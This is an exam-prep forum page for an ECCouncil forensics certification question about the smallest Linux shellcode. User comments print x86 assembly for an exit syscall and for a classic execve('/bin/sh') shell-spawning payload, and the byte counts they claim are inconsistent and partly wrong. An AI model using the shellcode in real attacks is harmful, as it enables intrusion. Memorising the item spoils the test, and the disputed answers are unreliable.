Exam 312-49v10 topic 1 question 163 discussion

Actual exam question from ECCouncil's 312-49v10
Question #: 163
Topic #: 1

In Linux, what is the smallest possible shellcode?

  • A. 24 bytes
  • B. 8 bytes
  • C. 800 bytes
  • D. 80 bytes
Suggested Answer: A

Comments

044f354
1 week, 5 days ago
Selected Answer: B
8 bytes

System Call Structure:
- Linux uses syscalls to interact with the kernel, and these are invoked using specific registers.
- The syscall for exit(0) (terminating the process) is one of the simplest examples.

8-Byte Example Shellcode (assembly code):

    xor eax, eax   ; Clears EAX register (sets exit code to 0)
    inc eax        ; Sets EAX to 1 (syscall number for `exit`)
    xor ebx, ebx   ; Clears EBX register (exit code argument)
    int 0x80       ; Trigger the syscall interrupt

This shellcode:
- Sets up the syscall number for exit (1 in EAX).
- Clears the EBX register (sets exit code to 0).
- Executes the syscall with int 0x80.

Byte Representation (Machine Code):
The above assembly translates to an 8-byte machine code sequence (hexadecimal): 31 C0 40 31 DB CD 80

This is functional and minimal shellcode.
upvoted 1 times
...
torabi123
1 month, 2 weeks ago
Here's a basic example of a small Linux shellcode in x86 assembly for spawning a shell:

    section .text
    global _start

    _start:
        xor eax, eax      ; Clear EAX register
        push eax          ; Push a null byte onto the stack (terminating null)
        push 0x68732f2f   ; Push "/bin/sh" onto the stack
        push 0x6e69622f
        mov ebx, esp      ; Set EBX to point to the string "/bin/sh"
        push eax          ; Push a null byte onto the stack (end of string)
        mov edx, esp      ; Set EDX to point to the null byte
        push ebx          ; Push the address of "/bin/sh" (EBX) onto the stack
        mov ecx, esp      ; Set ECX to point to the address of "/bin/sh"
        mov al, 0xb       ; Set AL to 11, which is the syscall number for execve
        int 0x80          ; Call the kernel to execute "/bin/sh"

This is a minimal shellcode that spawns a shell ("/bin/sh") and is only 23 bytes in size. --> 24 bytes
upvoted 1 times
...
BarryMacockener
1 year, 1 month ago
I'm pretty sure the answer is actually 8, unless this question is outdated. You can find a number of examples of Linux shellcode on the internet that are smaller than 24 bytes. I've seen one as small as 10.
upvoted 3 times
...
Community vote distribution: A (35%, most voted), C (25%), B (20%), Other